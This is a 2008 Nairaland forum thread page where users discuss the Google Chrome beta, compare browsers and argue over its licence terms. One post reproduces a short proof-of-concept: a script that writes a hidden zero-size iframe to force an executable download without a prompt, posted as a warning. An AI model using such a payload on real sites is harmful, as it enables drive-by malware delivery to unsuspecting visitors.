Welcome, Guest: Register On Nairaland / LOGIN! / Trending / Recent / New
Stats: 3,194,683 members, 7,955,534 topics. Date: Sunday, 22 September 2024 at 08:32 AM

Google Browser Challenges Microsoft: Google Chrome - Computers (3) - Nairaland

Nairaland Forum / Science/Technology / Computers / Google Browser Challenges Microsoft: Google Chrome (12316 Views)

Opera Vs Mozilla Vs Google Chrome: Which Is The Fastest Web Browser? / Can't Open Facebook On Google Chrome. / Google Announces Own OS (Google Chrome OS) (2) (3) (4)

(1) (2) (3) (4) (5) (Reply) (Go Down)

Re: Google Browser Challenges Microsoft: Google Chrome by Nobody: 7:03pm On Sep 03, 2008
This war or competition is just good for us in short run. In the long run, I don't know the fall-outs. Now I have an alternative to my IE that is not allowing me to print off stuff on my Vista 32bit. I think I love the feel of the Chrome. I believe someone gives someone good run for his money. www.cuil.com is a good search engine from google and gmail is a good mailbox from google. But why requesting the internet to install and I realized this is a beta version.This is a good thingy as I said for now!
Re: Google Browser Challenges Microsoft: Google Chrome by Greycells(m): 7:11pm On Sep 03, 2008
Google Chrome vulnerable to carpet-bombing flaw by Ryan Naraine

http://blogs.zdnet.com/security/?p=1843&tag=nl.e539

Google’s shiny new Web browser is vulnerable to a carpet-bombing vulnerability that could expose Windows users to malicious hacker attacks.

Just hours after the release of Google Chrome, researcher Aviv Raff discovered that he could combine two vulnerabilities — a flaw in Apple Safari (WebKit) and a Java bug discussed at this year’s Black Hat conference — to trick users into launching executables direct from the new browser.

Raff has cooked up a harmless demo of the attack in action, showing how a Google Chrome users can be lured into downloading and launching a JAR (Java Archive) file that gets executed without warning.

[ SEE: Google Chrome, the security tidbits ]

In the proof-of-concept, Raff’s code shows how a malicious hacker can use a clever social engineering lure — it requires two mouse clicks — to plant malware on Windows desktops.

The Google Chrome user-agent shows that Chrome is actually WebKit 525.13 (Safari 3.1), which is an outdated/vulnerable version of that browser.

Apple patched the carpet-bombing issue with Safari v3.1.2.

Some Google Chrome early adopters using Windows Vista are reporting that files downloaded from the Internet are automatically dropped on the desktop, setting up a scenario where a combo-attack using this unpatched IE flaw could be used in attacks.

Ryan Naraine is a journalist and social media enthusiast specializing in Internet and computer security issues. He is currently security evangelist at Kaspersky Lab, an anti-malware company with operations around the world.
Re: Google Browser Challenges Microsoft: Google Chrome by identified(m): 7:34pm On Sep 03, 2008
im on chrome now, i must confess there's no much difference btw it and firefox, i guess i'll who wins wit time.
Re: Google Browser Challenges Microsoft: Google Chrome by inze(m): 7:48pm On Sep 03, 2008
the last time i checked, IE 8 has got the restore session thing. !!

You might wanna have a look in google.

Inze has spoken
Re: Google Browser Challenges Microsoft: Google Chrome by nazzyon(m): 8:12pm On Sep 03, 2008
I have finally concluded that Firefox is the best.

Even this chrome cannot compete with Firefox 2 let alone 3. Google developers need to get to work on that security aspect of this browser, it still has some holes but not as bad as IE's.

It will compete with Opera Browser, if the DEV teams can get more add-ons for users who crave them.

Unfortunately, I will not be part of the people that will experience the rebirth of this browser.
Re: Google Browser Challenges Microsoft: Google Chrome by xheggs(m): 8:25pm On Sep 03, 2008
I love it.,.,.its really cool.
thou for designers, it might be a bad idea because i checkd some pages and they were pretty messed up.
but i bliv with time, they'll catch up with mozilla

Re: Google Browser Challenges Microsoft: Google Chrome by xheggs(m): 8:42pm On Sep 03, 2008
nazzyon:

I have finally concluded that Firefox is the best.

Even this chrome cannot compete with Firefox 2 let alone 3. Google developers need to get to work on that security aspect of this browser, it still has some holes but not as bad as IE's.

It will compete with Opera Browser, if the DEV teams can get more add-ons for users who crave them.

Unfortunately, I will not be part of the people that will experience the rebirth of this browser.

dont underestimate google.
those guys hav insane developers.,.,.u'll see urself wat dis browser will look lyk in 8 months.
i installed google web accelarator. u shuld see how it works urself.
i bliv in those guys.,.,.its only microsoft dat i hav personal bef wif, lol,
Re: Google Browser Challenges Microsoft: Google Chrome by xheggs(m): 8:50pm On Sep 03, 2008
love safari too.,.,.its my 2nd favourite browser

Re: Google Browser Challenges Microsoft: Google Chrome by xheggs(m): 9:04pm On Sep 03, 2008
u guys need to see this.,.,.just came across it.
its a comic by Scott McCloud(1 of google graphics person)
giv me a min let me figure how to post it here
Re: Google Browser Challenges Microsoft: Google Chrome by xheggs(m): 9:10pm On Sep 03, 2008
Re: Google Browser Challenges Microsoft: Google Chrome by pheesayor(m): 9:11pm On Sep 03, 2008
I'm currently using it and it feels good
Re: Google Browser Challenges Microsoft: Google Chrome by WebMonk(m): 10:04pm On Sep 03, 2008
ok xheggs, you've beaten me on the chrome buzz.
Re: Google Browser Challenges Microsoft: Google Chrome by DualCore1: 11:11pm On Sep 03, 2008
ok i prefer portables, i was going to make a portable of this using thinstall but some dude already did. Download complete and its about 13 meg. i'm freaking out, i just pray its not as good as i think it is, cant leave my dear ol' firefox broken hearted. i'm off to try it.

zoooooooooooom

oh wait, heaven knows i'm not goinno be putting the chrome into consideration wen building for the web, IE is enough headache.
Re: Google Browser Challenges Microsoft: Google Chrome by DualCore1: 11:28pm On Sep 03, 2008
i'm on it now. . .
ahhh. . . firefox still remains my darl (what a relief, after all the hype, tsheew  angry)

wit the chrome thingy a new process is created per tab u open  angry angry  (or maybe cUz am using the portable).
its fast
its cool
its wow, but
its not firefox  grin tongue
and would never be like it  tongue
nice try goooofgle  grin

zooooomz off to firefox making the first and last post with CRackHOME
Re: Google Browser Challenges Microsoft: Google Chrome by WebMonk(m): 11:35pm On Sep 03, 2008
Dual Core:

oh wait, heaven knows i'm not goinno be putting the chrome into consideration when building for the web, IE is enough headache.

LOL. It took a lotta courage for me view own blog in it. Sadly, it's odd that it's painful (after making it valid in IE6, IE7 and FF prior to chrome)  cry

@Dual Core you no try at all. LOL
Re: Google Browser Challenges Microsoft: Google Chrome by DoyinO(f): 12:34am On Sep 04, 2008
Google Chrome? Well, it think its being over-hyped. Im currently using it on my system in addition to IE and im sad to say that i find IE faster. The browser, GC, is neat though. With improvements which are sure to come up, i think the application would be better.
Re: Google Browser Challenges Microsoft: Google Chrome by xheggs(m): 1:20am On Sep 04, 2008
Doyin O:

Google Chrome? Well, it think its being over-hyped. I'm currently using it on my system in addition to IE and im sad to say that i find IE faster. The browser, GC, is neat though. With improvements which are sure to come up, i think the application would be better.

@Doyin
do u work for microsoft??
Re: Google Browser Challenges Microsoft: Google Chrome by xheggs(m): 2:07am On Sep 04, 2008
some guys said earlier that they prefer Opera to Firefox cuz of speedials.,.,.i'll show u d power of my fully pimped Firefox.
d 1st image is the normal Ctrl+T or click on new tab
d second image is when u click on where the red arrow is pointing
d 3rd image is Ctrl+Tab: speed & easy navigation
there r many more: i can refresh, back, forward, stop and navigate a non active tab without clicking on it: when i move d mouse ovr, i get a resized image of the tab. and many more

all this stuffs r plugins made by users. and since Chrome its open source too.,.,.,.i xpect to see more of stuffs lyk dat
honor suld be given to whom its due.

Re: Google Browser Challenges Microsoft: Google Chrome by xheggs(m): 2:10am On Sep 04, 2008

Re: Google Browser Challenges Microsoft: Google Chrome by PurestBoy(m): 3:50am On Sep 04, 2008
Tested and Trusted. I had downloaded it and I must say this is the best browser anyone can use. I encourage you to get it.
Re: Google Browser Challenges Microsoft: Google Chrome by xeroxspy1: 7:01am On Sep 04, 2008
Google Chrome vuln
Re: Google Browser Challenges Microsoft: Google Chrome by xeroxspy1: 7:09am On Sep 04, 2008
Google Chrome vulnerable, so chrome users b careful, Google's new Web browser (Chrome) allows files (e.g., executables) to be automatically downloaded to the user's computer without any user prompt. This proof-of-concept was created for educational purposes only. Use the code it at your own risk. The author will not be responsible for any damages. Tested on Windows Vista SP1and Windows XP SP3 with Google Chrome (BETA). Ref milw0rm<dot>com ************************************************************************** <script> document.write('<iframe src="http://www.example.com/hello.exe" frameborder="0" width="0" height="0">'); </script>
Re: Google Browser Challenges Microsoft: Google Chrome by bigrovar(m): 7:17am On Sep 04, 2008
Before we all start getting hard-ons with the chrome browser you might want to spend some time to Read the Licensing Agreement which You must have Blindly Clicked yes to

Here's the relevant section 11.1 of the Chrome EULA:  End User Agreement

11. Content licence from you

11.1 You retain copyright and any other rights that you already hold in Content that you submit, post or display on or through the Services. By submitting, posting or displaying the content, you give Google a perpetual, irrevocable, worldwide, royalty-free and non-exclusive licence to reproduce, adapt, modify, translate, publish, publicly perform, publicly display and distribute any Content that you submit, post or display on or through the Services. This licence is for the sole purpose of enabling Google to display, distribute and promote the Services and may be revoked for certain Services as defined in the Additional Terms of those Services.

Image of HAL eye from 2001 movie with Chrome logo in eye

Granting Google 'a perpetual, irrevocable, worldwide, royalty-free and non-exclusive licence to reproduce, adapt, modify, translate, publish, publicly perform, publicly display and distribute any Content that you submit, post or display on or through' Chrome is coming it rich.

Suppose Google does this to material you have posted that's not yours? No problem. It has a get-out-of-jail card signed by you in section 11.4 of the EULA:

11.4 You confirm and warrant to Google that you have all the rights, power and authority necessary to grant the above licence.

But you may be posting material via Chrome to your employer's site and it owns the copyright of anything you create in work time. What then if Google adapts, modifies and distributes it? Your fan has brown stuff all over it but none of it sticks to Google.

until the Licensing issues are sorted out ,  and my contentand copy right are not stampled on That browser is not going to touch my hard drive
Re: Google Browser Challenges Microsoft: Google Chrome by tpia: 7:30am On Sep 04, 2008
@bigrovar: are you sure other OS don't also have the same conditions in their licensing agreements?
Re: Google Browser Challenges Microsoft: Google Chrome by DualCore1: 7:43am On Sep 04, 2008
Nairaland's EULA
You agree with the webmaster, Oluwaseun Osewa, that:
1) The Nairaland Forum is owned by me, and me alone.

2) You will obey all the rules of this forum at all times.

3) Your posts may be deleted or modified at any time at my discretion.

4) Your membership may be revoked at any time, at my discretion.

5) You will obey all the rules of this forum at all times.

Google's EULA
You retain copyright and any other rights that you already hold in Content that you submit, post or display on or through the Services. By submitting, posting or displaying the content, you give Google a perpetual, irrevocable, worldwide, royalty-free and non-exclusive licence to reproduce, adapt, modify, translate, publish, publicly perform, publicly display and distribute any Content that you submit, post or display on or through the Services. This licence is for the sole purpose of enabling Google to display, distribute and promote the Services and may be revoked for certain Services as defined in the Additional Terms of those Services.

Say NO to google
Say NO to lipsrsealed

grin grin
Re: Google Browser Challenges Microsoft: Google Chrome by bigrovar(m): 7:45am On Sep 04, 2008
tpia:

@bigrovar: are you sure other OS don't also have the same conditions in their licensing agreements?
at least Firefox,Konqueror , amd seamonkey don't have that type of licensing ,  but i can't speak for all browsers ,  only for what i use ,  and that is beside the point ,  if a license tries to rip u off your hard earn intellectual property ,  its bad ,  its very bad ,  especially for those of us who blog or have display our music or art work online,
Re: Google Browser Challenges Microsoft: Google Chrome by bigrovar(m): 7:48am On Sep 04, 2008
You agree with the webmaster, Oluwaseun Osewa, that:
1) The Nairaland Forum is owned by me, and me alone.

2) You will obey all the rules of this forum at all times.

3) Your posts may be deleted or modified at any time at my discretion.

4) Your membership may be revoked at any time, at my discretion.

5) You will obey all the rules of this forum at all times.

nothing wrong with the above , at least it doesnt say it has exclusive right to your content , its just there to make sure that decency is followed
Re: Google Browser Challenges Microsoft: Google Chrome by Seun(m): 7:50am On Sep 04, 2008
Careful.
Re: Google Browser Challenges Microsoft: Google Chrome by africanboy(m): 8:03am On Sep 04, 2008
I like the browser, but I dont think it is Firefox (or even IE killer). At least, not yet. I did some mini view on my blog.
http://9jasite.com/2008/09/02/google-chrome-my-first-impression/

Despite the tab isolation, Flash crashed across all tabs.
http://9jasite.com/2008/09/03/my-first-google-chrome-crash-shockwave/

A simple link crashed the whole browser.
http://9jasite.com/2008/09/04/chrome-too-weak-to-fight-evil/
Re: Google Browser Challenges Microsoft: Google Chrome by Nobody: 8:18am On Sep 04, 2008
I am currently using it, in fact its what I am using to type this, and it seems ok. Only prob is that when I am looking at albums on facebook and I want to move forward, it flickers to the next picture and returns to the former one, but it seems very good so far, IE is definitely at the bottom of the browser ladder, chrome even has the google search functionality built in the address bar, nice so far,
Re: Google Browser Challenges Microsoft: Google Chrome by DualCore1: 8:47am On Sep 04, 2008
bigrovar:

nothing wrong with the above , at least it doesnt say it has exclusive right to your content , its just there to make sure that decency is followed

na man, just kidding. . . lol.

wavemasta:

I am currently using it, in fact its what I am using to type this, and it seems ok. Only prob is that when I am looking at albums on facebook and I want to move forward, it flickers to the next picture and returns to the former one, but it seems very good so far, IE is definitely at the bottom of the browser ladder, chrome even has the google search functionality built in the address bar, nice so far,
Chrome just beat IE's record for the bottom-of-the-ladder award.
Re: Google Browser Challenges Microsoft: Google Chrome by subice(m): 9:17am On Sep 04, 2008
I've tried it out, but not convincing enough for me to switch from Firefox. Even more so after reading the info pointed out above by bigrovar.

(1) (2) (3) (4) (5) (Reply)

Tips To Protect Yourself From Laptop Radiation: / @@@ Do You Need A Professional Website(Jumia, Olx, Courier ETC) / Community(P2P) / I Helped Steve Jobs Create The Mac — Bill Gates

(Go Up)

Sections: politics (1) business autos (1) jobs (1) career education (1) romance computers phones travel sports fashion health
religion celebs tv-movies music-radio literature webmasters programming techmarket

Links: (1) (2) (3) (4) (5) (6) (7) (8) (9) (10)

Nairaland - Copyright © 2005 - 2024 Oluwaseun Osewa. All rights reserved. See How To Advertise. 50
Disclaimer: Every Nairaland member is solely responsible for anything that he/she posts or uploads on Nairaland.